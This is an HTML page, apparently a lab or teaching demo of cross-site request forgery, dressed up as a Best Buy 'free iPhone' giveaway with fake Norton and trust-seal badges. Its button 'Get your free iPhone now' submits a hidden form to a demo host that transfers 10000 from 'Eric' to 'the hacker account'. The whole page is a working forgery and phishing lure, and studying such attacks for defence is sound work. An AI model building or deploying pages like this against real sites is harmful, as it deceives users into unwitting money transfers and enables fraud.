<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Welcome</title>
</head>
<body>

<img src="/static/deal.png" width="450" height="300" />
<img src="/static/iphone.jpg" width="300" height="200" />

<form action="http://www.gwdemo.net:8000/account" method="POST">
    <input type="hidden" name="sender" value="Eric">
    <input type="hidden" name="recipient" value="Eric's clone">

    <input type="hidden" name="amount" value="10000">
    <input type="hidden" name="account" value="the hacker account........">
    <l>Thank you for being a loyal Best Buy customer!</l>
  <input type="submit" value="Get your free iPhone now">
</form>

<img src="/static/creditcard.JPEG" width="252" height="54" />
<img src="/static/norton.png" width="80" height="42" />
<img src="/static/trustsite.png" width="80" height="42" />

</body>
</html>